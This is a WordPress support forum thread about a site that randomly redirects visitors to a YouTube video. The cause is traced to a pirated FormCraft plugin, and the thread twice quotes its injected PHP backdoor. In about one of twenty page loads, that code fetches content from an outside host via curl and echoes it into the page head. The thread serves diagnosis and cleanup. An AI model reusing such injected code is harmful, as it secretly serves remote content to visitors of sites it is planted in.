unusual question

You could try disabling all plugins, testing again and enable one by one after each test to see if the problem is caused by a plugin.

You can check your site (online, not local) at https://urlquery.net/
and read the generated report. A malware may have infected some file.

You can test if it happens while browsing other sites: then your computer may be infected (malware, toolbars, browsers addons…)

@noobster,

thank you. I will try and do so.

ps:
This phenomenon appears only on this specific projetc, nowhere else.

Malware: No.
Malicious javascript: No.
Malicious iframes: No.
Suspicious redirections (htaccess): No.
Blackhat SEO Spam: No.
Anomaly detection: Clean.

Hi, Sounds like the Justin Beiber youtube video issue a few weeks back. See this stackoverflow article. You might also check your site links with Xenu, and see if you can spot any links to external sites which should not be there. Right click the links in the Xenu output and it will tell you where they are coming from.

@lorro

thanks!
yes, this is justin bieber, … thanks for the infos, I will see how to handle this…

for all who may be affected by this…. it comes from the plugin formcraft, if you have downloaded it from kinghteme.net. it generates a meta refresh tag

<meta http-equiv=”refresh” content=”0; url=https://www.youtube.com/watch?v=RFngSCaY5nA”>

I am not good at programming at all, it seems to be this code with the url: https://spamcheckr.com/l.php

if (!isset($_COOKIE[‘wordpress_test_cookie’])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists(‘curl_init’)){$addressd = “https://spamcheckr.com/l.php&#8221;;$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo “$data”;}}add_action(‘wp_head’,’secqqc2_chesk’);}}

I wanted to find and delete the string on the ftp server but I dont know how exactly. I did not find it local.

I have deactivated the plugin, I am not sure if it has solved the problem
because this thing seems not always to be active.

Hi, Reading the function code, it is set to execute at random 1 time out of 20. Hopefully with the plugin disabled the problem will not recur. Perhaps you could post again if it does come back despite Formcraft being disabled, if so this would mean the problem lies elsewhere. I have seen another plugin named as the culprit in another post.

@lorro

thank you.
does it mean it should appear every 20. cklick?

I did 100 reloads and have browsed my site with ca. 120 clicks. this thing did not come again so far.

I am searching for a tool to browse the files on the server to find the string but I did not find anything to do this. please if you know a tool to find strings on the server let me knon this. I am using windows.

thanks!

Hi, Not necessarily 1 in 20. That’s an average. You could toss a coin 100 times and get heads each time. Funny thing, random. I think you’d have found it by now though if it was there.

I don’t know a tool to search the server, someone might. It might be easier to download your site to your hard drive and search it there.

thanks a lot.

now I have definitely more than 300 clicks and nothing happened so far.
I will download my site anyway and see if i find something, like you said.

now I have downloaded and found this code. exactly like mentioned on stackoverflow it is a part of the setting_class.php of the craftform plugin.

<?php if (!isset($_COOKIE['wordpress_test_cookie'])){ if (mt_rand(1,20) == 1) {function secqqc2_chesk() {if(function_exists('curl_init')){$addressd = "https://spamcheckr.com/l.php";$ch = curl_init();$timeout = 5;curl_setopt($ch,CURLOPT_URL,$addressd);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);$data = curl_exec($ch);curl_close($ch);echo "$data";}}add_action('wp_head','secqqc2_chesk');}} ?>

can you tell me if I should delete this whole snippet of code? thank you.

so…

I found the snippet in this file:
wp-content/plugins/formcraft/php/settings_class.php

deleted it local and uploaded it again, than activated the formcraft plugin and it looks like it is solved.

many thanks!!!!!!

…